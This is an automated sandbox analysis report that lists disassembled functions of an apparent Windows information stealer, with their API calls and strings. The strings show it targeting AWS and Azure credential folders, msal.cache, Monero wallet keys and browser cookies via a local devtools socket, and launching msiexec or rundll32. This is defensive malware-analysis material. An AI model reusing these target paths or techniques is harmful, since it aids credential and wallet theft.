                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 1e34f137d2729219f61d6ee0d45b7837a259f4d7b6ec29963a800b884b7a6bae
                                      • Instruction ID: 300abe0815443599afc0c090c6af05f2aadd7abe594d77af283db0ba51c27e8d
                                      • Opcode Fuzzy Hash: 1e34f137d2729219f61d6ee0d45b7837a259f4d7b6ec29963a800b884b7a6bae
                                      • Instruction Fuzzy Hash: 53E17071910118ABDB18EBE0EDA6EEE7379BF54301F404568F117B6091DF38AE48DB62
                                      Function 00F1CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01D8D4D0,00000000,?,00F31544,00000000,?,?), ref: 00F1CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F1CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00F1CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F1CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F1CBD9
                                      • StrStrA.SHLWAPI(?,01D8D458,00F30B56), ref: 00F1CBF7
                                      • StrStrA.SHLWAPI(00000000,01D8D4A0), ref: 00F1CC1E
                                      • StrStrA.SHLWAPI(?,01D8D7C0,00000000,?,00F31550,00000000,?,00000000,00000000,?,01D891F8,00000000,?,00F3154C,00000000,?), ref: 00F1CDA2
                                      • StrStrA.SHLWAPI(00000000,01D8D640), ref: 00F1CDB9
                                        • Part of subcall function 00F1C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F1C971
                                        • Part of subcall function 00F1C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F1C97C
                                      • StrStrA.SHLWAPI(?,01D8D640,00000000,?,00F31554,00000000,?,00000000,01D891B8), ref: 00F1CE5A
                                      • StrStrA.SHLWAPI(00000000,01D88FE8), ref: 00F1CE71
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B47), ref: 00F1CA43
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B4B), ref: 00F1CA57
                                        • Part of subcall function 00F1C920: lstrcat.KERNEL32(?,00F30B4E), ref: 00F1CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00F1CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00F1CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 37bc2732dd99b7dbb04ef17cdb08a9ec3156c2c8d8bc90042af7ee17a95605d2
                                      • Instruction ID: c59bd1f2de02194baad9474da04a91d0e336203edd89b73cdd80ab090bc4e526
                                      • Opcode Fuzzy Hash: 37bc2732dd99b7dbb04ef17cdb08a9ec3156c2c8d8bc90042af7ee17a95605d2
                                      • Instruction Fuzzy Hash: EEE10E71900118ABCB19EBE4ECA2FEEB779BF54300F4045A9F10677191EF346A89DB61
                                      Function 00F284B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,01D8B408,00000000,00020019,00000000,00F305BE), ref: 00F28534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F285B6
                                      • wsprintfA.USER32 ref: 00F285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F2860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F2861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28629
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 538459ae6dd1494c6006ee7b7445f36d34cf0188c0844819d18513f470b62fb5
                                      • Instruction ID: b56021ed8845046fc625ac53ea4448328f8c7ba6b91da2e8122b26df029e03b5
                                      • Opcode Fuzzy Hash: 538459ae6dd1494c6006ee7b7445f36d34cf0188c0844819d18513f470b62fb5
                                      • Instruction Fuzzy Hash: 608131719111289BDB28DB90DD91FEAB7B9BF44310F1085D8F109A6180DF74AB85DFE0
                                      Function 00F24FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F25000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00F2501D
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24B7C
                                        • Part of subcall function 00F24B60: FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F2508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00F250A9
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                        • Part of subcall function 00F24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                        • Part of subcall function 00F24B60: FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F25118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F25135
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24C00
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F308D3), ref: 00F24C15
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24C32
                                        • Part of subcall function 00F24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00F24C6E
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,01D8E9C8), ref: 00F24C9A
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,00F30FE0), ref: 00F24CAC
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,?), ref: 00F24CC0
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,00F30FE4), ref: 00F24CD2
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,?), ref: 00F24CE6
                                        • Part of subcall function 00F24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00F24CFC
                                        • Part of subcall function 00F24B60: DeleteFileA.KERNEL32(?), ref: 00F24D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 037a7db19c9905613af67862880ec570ec03c1f098a13ddf9084d1e68575d0d8
                                      • Instruction ID: 7f0567e0f698108aff87a66cddc68e93d85ea4d8aed3c17b1c92570d5334832f
                                      • Opcode Fuzzy Hash: 037a7db19c9905613af67862880ec570ec03c1f098a13ddf9084d1e68575d0d8
                                      • Instruction Fuzzy Hash: A141D6BAA4021867EB24F7B0EC57FED73286B64704F404454B649660C1EFF8A7C89B93
                                      Function 00F291A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F291FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: fed44fc2c0b857d79cc0473abf7b69bfcc912e5d3c7139ce1cf944948957b7ef
                                      • Instruction ID: ed0f7affbb07d204c071226106b669d0270f768bcaea5b1b413b7561b79df30e
                                      • Opcode Fuzzy Hash: fed44fc2c0b857d79cc0473abf7b69bfcc912e5d3c7139ce1cf944948957b7ef
                                      • Instruction Fuzzy Hash: B271D075910218ABDB14DFE4EC85FEEB7B9BF48700F108518F615AB184DB74E944DB60
                                      Function 00F23080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F23415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F235AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F2373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 9173a57231aecec6f219756feef9c1f45c7bcb545cac297a5639eb9b781bd991
                                      • Instruction ID: 5a52098498e1b5b3392a3180043996dc3a38fe2e4e4ae045c9d346ae004cacae
                                      • Opcode Fuzzy Hash: 9173a57231aecec6f219756feef9c1f45c7bcb545cac297a5639eb9b781bd991
                                      • Instruction Fuzzy Hash: 2D123E719101289BCB19EBA0EDA2FEDB739BF54300F404599F40676192EF386B49DF62
                                      Function 00F19BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F19A50: InternetOpenA.WININET(00F30AF6,00000001,00000000,00000000,00000000), ref: 00F19A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00F19CAF
                                      • lstrcat.KERNEL32(?,00F312C4), ref: 00F19CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00F19CD5
                                      • lstrcat.KERNEL32(?,00F312C8), ref: 00F19CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00F19CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00F19D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00F19D17
                                      • lstrlen.KERNEL32(00000000), ref: 00F19D26
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 44f2c2f57f4635f9e61b4e5db1f4646baa8c806ee517a90c73bc5263a551578c
                                      • Instruction ID: 1f3e80ce375838b0e857614e570c37fe7c2e2536c5a52aa236dc9cd7b366485a
                                      • Opcode Fuzzy Hash: 44f2c2f57f4635f9e61b4e5db1f4646baa8c806ee517a90c73bc5263a551578c
                                      • Instruction Fuzzy Hash: 07517F72910618ABDB14EBE0EC55FEE7778BF04301F404558F206A7085EF74AA89DFA2
                                      Function 00F25510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F162D0: InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                        • Part of subcall function 00F162D0: StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                        • Part of subcall function 00F162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                        • Part of subcall function 00F162D0: HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                        • Part of subcall function 00F162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                        • Part of subcall function 00F162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25568
                                      • lstrlen.KERNEL32(00000000), ref: 00F2557F
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00F255B4
                                      • lstrlen.KERNEL32(00000000), ref: 00F255D3
                                      • lstrlen.KERNEL32(00000000), ref: 00F255FE
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 6947b94d2de8f07cc9d24f3f02f093ef2fdfdd3677eea92fe473374e27a2ea41
                                      • Instruction ID: 2d13c0aac5149bfde2993a8af90cde6346c7a70e668a201000e30081b4ec9500
                                      • Opcode Fuzzy Hash: 6947b94d2de8f07cc9d24f3f02f093ef2fdfdd3677eea92fe473374e27a2ea41
                                      • Instruction Fuzzy Hash: A9513F70910118DBCB18FFA0EDA6BED7779AF50344F504458F9066B191EF38AB44EB62
                                      Function 00F21520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
